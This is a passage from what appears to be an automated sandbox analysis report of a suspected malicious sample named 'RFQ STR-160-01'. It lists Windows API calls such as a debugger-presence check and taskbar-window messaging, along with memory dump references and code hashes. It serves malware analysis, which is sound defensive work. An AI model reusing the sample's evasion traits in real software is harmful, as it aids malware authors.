                • Part of subcall function 005AF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005B0D71,?,?,?,0059100A), ref: 005AF7CE
              • IsDebuggerPresent.KERNEL32(?,?,?,0059100A), ref: 005B0D75
              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0059100A), ref: 005B0D84
              Strings
              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005B0D7F
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
              • API String ID: 55579361-631824599
              • Opcode ID: 747434c0f708576bae3b4b98cf303e874e97834cf6f2620b5fe8761b5eb6b778
              • Instruction ID: a74cd3897d128a138d9b65661f01b3e5490de83ec7a7949271f87f36ab37e617
              • Opcode Fuzzy Hash: 747434c0f708576bae3b4b98cf303e874e97834cf6f2620b5fe8761b5eb6b778
              • Instruction Fuzzy Hash: A2E03970200B118FD7309FA8E4083967FE1BB00744F01592DE482C66A1DBB1E4458B91
              APIs
              • __Init_thread_footer.LIBCMT ref: 005AE3D5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: 0%f$8%f
              • API String ID: 1385522511-1024914575
              • Opcode ID: 73bf765b08976110d30de336258566b6578e2db9124e581fd1f5430cad22d91a
              • Instruction ID: e8499c8be656e4461019df547e4380db14850bcb31236055001ea5960811fdeb
              • Opcode Fuzzy Hash: 73bf765b08976110d30de336258566b6578e2db9124e581fd1f5430cad22d91a
              • Instruction Fuzzy Hash: BDE08631414D12CBCF249B1CF8BAA8D3B57BB46320B502977E113871D1BB703C418655
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: LocalTime
              • String ID: %.3d$X64
              • API String ID: 481472006-1077770165
              • Opcode ID: 52d89993d8c71815247e024a3a10b4e82c9430e9b7fbb67ac166cb00b5ca3816
              • Instruction ID: 9c915665acc56e1bda11dc0c655e14ca7d344d4649c160493319945c4f7ac61c
              • Opcode Fuzzy Hash: 52d89993d8c71815247e024a3a10b4e82c9430e9b7fbb67ac166cb00b5ca3816
              • Instruction Fuzzy Hash: 42D01265C09149E9CB9496E1DC498BDBB7CBB19341F508852FE56A1040E634C5086771
              APIs
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062236C
              • PostMessageW.USER32(00000000), ref: 00622373
                • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FindMessagePostSleepWindow
              • String ID: Shell_TrayWnd
              • API String ID: 529655941-2988720461
              • Opcode ID: 167c2429b66275e26fb31f92fb51defd816f2966475b8af279dc2e7918467207
              • Instruction ID: 124ee3df2e6cdaee00c39b395c58a7dec0cd7aa39135fd508a7c7630df96400f
              • Opcode Fuzzy Hash: 167c2429b66275e26fb31f92fb51defd816f2966475b8af279dc2e7918467207
              • Instruction Fuzzy Hash: 0DD0C932381B14BAE674A770DC0FFCA6A16AB44B21F415A167745AA1E0C9F4A806CA54
              APIs
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062232C
              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0062233F
                • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FindMessagePostSleepWindow
              • String ID: Shell_TrayWnd
              • API String ID: 529655941-2988720461
              • Opcode ID: 6e9598e881ef4df1aba474305e650a31a894e63d2afd3537857235c7df12ed59
              • Instruction ID: 4b0b6d2ac3b79391ba57d5738bda051152111f82eda50b719de37f5a863985a2
              • Opcode Fuzzy Hash: 6e9598e881ef4df1aba474305e650a31a894e63d2afd3537857235c7df12ed59
              • Instruction Fuzzy Hash: A7D02232380B00B7E374B730DC0FFCE7A06AB00B20F004A027705AA0E0C8F0A802CA10